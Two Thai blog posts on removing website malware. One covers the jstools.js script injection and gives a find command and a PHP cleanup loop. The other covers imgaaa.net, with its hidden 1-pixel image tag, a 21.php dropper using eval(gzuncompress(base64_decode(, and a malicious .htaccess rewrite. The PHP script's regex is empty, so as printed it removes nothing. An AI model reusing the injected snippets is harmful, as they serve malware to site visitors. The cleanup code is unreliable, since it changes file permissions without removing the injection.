Malware jstools.js

Written on 11:56 AM by ปั้มเงิน Cookie Run

วันนี้ก็ต้องมานั่งแก้ Malware jstools.js ขยันติดจริง เจ้า Malware jstools.js โดยลักษณะของ Code Malware ตัวนี้คือ
<script src="http://xn--wytrwa-g1a.tarnobrzeg.pl/jstools.js" type="text/javascript">
</script>
<script src="http://xn--niewraliwo-zhb12hem.swidnica.pl/jstools.js" type="text/javascript">
</script>


แล้วก็อื่นอีกหลายตัว แต่ลงท้ายด้วย/jstools.js

OK~ เรามาเริ่มวิธีจัดการมันเลยดีกว่า
ขั้นแรก เราต้องค้าหาไฟล์ที่ติดก่อน ในที่นี้คือไฟล์ indexและ main
find /home -name 'index.php' -or -name 'index.html' -or -name 'index.htm' -or -name 'main.php' -or -name 'main.html' -or -name 'main.htm' -or -name 'default.php' -or -name 'default.html' -or -name 'default.htm' >errors.txt
เนื่องจากผมต้องมานั่งแก้ทั้ง Server วิธีที่ดีที่สุดคือหาไฟล์เหล่านี้มาเก็บไว้ก่อนแล้วค่อย รันคำสั่งแก้ทีเดี่ยว เพราะถ้าไม่ทำแบบนี้มันจะหนัก Server.

ขั้นต่อมา คือเขียนคำสั่งวนลูป อ่านไฟล์ errors.txt หรือ ไฟล์ที่เก็บรายชื่อไฟล์ที่น่าจะติด Malware jstools.js ครับ ในที่นี่ผมเขียนคำสั่ง PHP แก้เอาง่ายดี เหอะๆ.

<?php
$inum = 0;
$files = "/home/errors.txt";
if(file_exists($files))
{
$filelist = file($files);
foreach($filelist as $file)
{
$text = $count = false;
if( trim($file) !== '' ) $file = trim($file);
$str = array('@@si');
chmod($file,0777);
$fp = fopen($file, 'r');
$text = @fread($fp, filesize($file));
$text = preg_replace($str, '', $text, -1 , $count);
fclose($fp);
$fp = fopen($file, 'w+');
fwrite($fp, $text);
fclose($fp);
chmod($file,0444);

if($count){
++$inum;
$fh = fopen('/home/log.txt', 'a');
$log = $file." Edit:{$count}\r\n";
fwrite($fh, $log);
fclose($fh);
echo $inum;
echo $file."\n";
}
}

}
?>


แค่นี้ละจบกันทีกับ Malware jstools.js

เว็บมัลแวร์ "imgaaa.net" (Web-Malware Spoofing Images )

Written on 1:51 PM by ปั้มเงิน Cookie Run

ว่าด้วยเรื่อง เว็บมัลแวร์ imgaaa.net ซึ่งกำลังระบาดอยู่ในตอนนี้ เชื่อว่าหลายๆเว็บกำลังเจอกันอยู่จนทำให้เว็บไม่สามารถเข้าได้ผ่าน Mozilla Firefox หรือ ถูกแจ้งว่าเป็นเว็บไซต์อันตรายจาก Google ซึ่งลักษณะการทำงานของ imgaaa.net จะมีลักษณะการทำงานเหมือน trojan หรือ sniffer ที่ค่อยดักข้อมูลการรับส่งผ่าน FTP ที่เรากำลังใช้งาน โดยเว็บหรือหน้าเพจที่ติด เว็บมัลแวร์ ตัวนี้จะถูกแทรกด้วย Code
<img border="0" heigth="1" src="http://imgaaa.net/t.php?id=36910902" width="1" />

โดยวิธีการแก้ หรือ ตรวจหาเว็บมัลแวร์ imgaaa.net  มีดังนี้
1. FTP เข้าสู่เว็บของท่าน

2.
ทำการค้นหาไฟล์ "21.php" ถ้ามีเมื่อเปิดดูจะพบ Code<? eval(gzuncompress(base64_decode( ซึ่งมันจะทำการแพร่กระจายเว็บมัลแวร์ ดังกล่าวไปยังไฟล์ต่างๆ โดยไฟล์ที่โดนบ่อยคือไฟล์ Index.php,Index.html หรือ police.php ซึ่งมันจะทำการแทรก Code
<img border="0" heigth="1" src="http://imgaaa.net/t.php?id=36910902" width="1" /> ในบรรทัดสุดท้ายของไฟล์ที่โดน

3.
วิธีการลบ หรือจัดการกับเว็บมัลแวร์ "imgaaa.net" นั้นทำได้โดยง่าย คือลบ Code ดังกล่าวออกไป หรือจะอัพโหลด ไฟล์เก่าที่มีขึ้นไปแทนก็ได้ แต่คนที่สามารถ PuTTY ไปที่ SV. ได้นั้น สามารถใช้คำสั่ง grep -lr imgaaa.net เพื่อทำการค้นหาไฟล์ที่ติดเว็บมัลแวร์ตัวนี้ได้ ซึ่งมันน่าจะสะดวกกว่าการเปิดหาเองทีละไฟล์

4.
สุดท้ายถ้าเว็บคุณมีไฟล์ “.htaccess” อย่าลืมลองเปิดดูว่ามี Code RewriteRule ^(.*)$ /wp-admin/21.php?q=$1 อยู่หรือไม่ หากมีให้ลบออกไป เพราะไม่งั้นเว็บของคุณ อาจจะเข้าใช้งานไม่ได้ครับ

คำแนะนำ
สำหรับคนที่ใช้ CMS สำเร็จรูปควรมีการอัพเดพระบบอยู่เสมอ เพื่อแก้ไขช่องโหว่ต่างๆที่ถูกพบ และในกรณีที่ติด เว็บมัลแวร์ ไปแล้วก็ควรรีบแก้ปัญหาและเปลี่ยนรหัสผ่านการเข้าใช้ FTP ทันที เพราะเว็บมัลแวร์อาจเข้ามาแพร่กระจ่ายต่อผ่าน FTP ที่ตุณเข้าใช้ก็ได้....

X Close